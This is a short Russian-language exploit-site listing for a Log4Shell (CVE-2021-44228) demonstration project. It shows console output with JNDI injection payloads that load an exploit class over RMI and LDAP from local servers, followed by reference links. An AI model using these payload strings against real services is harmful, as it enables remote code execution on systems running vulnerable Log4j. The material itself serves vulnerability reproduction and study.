## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MZLOGIN-CVE-2021-44228-DEMO
# CVE-2021-44228-Demo
Пример удаленного внедрения кода с использованием CVE-2021-44228 через RMI и LDAP.

root@kitploit:~
Exploit class from RMI Server loaded
Hello, ${jndi:rmi://127.0.0.1:1099/exploit}
Exploit class from LDAP Server loaded
Hello, ${jndi:ldap://127.0.0.1:1389/org.mazhuang.ldap.Exploit}
Запуск RmiServer и LdapServer зависит от Python3.
## Ссылки
* Воспроизведение уязвимости удаленного выполнения кода Apache Log4j2
* Уязвимость Log4j высокого риска! Анализ конкретных причин! Первый во всем интернете! и Уязвимость Log4j высокого риска (дополнительное видео)
* Log4j Lookups
* Apache Log4j2 от RCE до обхода RC1
* tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce
* PSA: Log4Shell and the current state of JNDI injection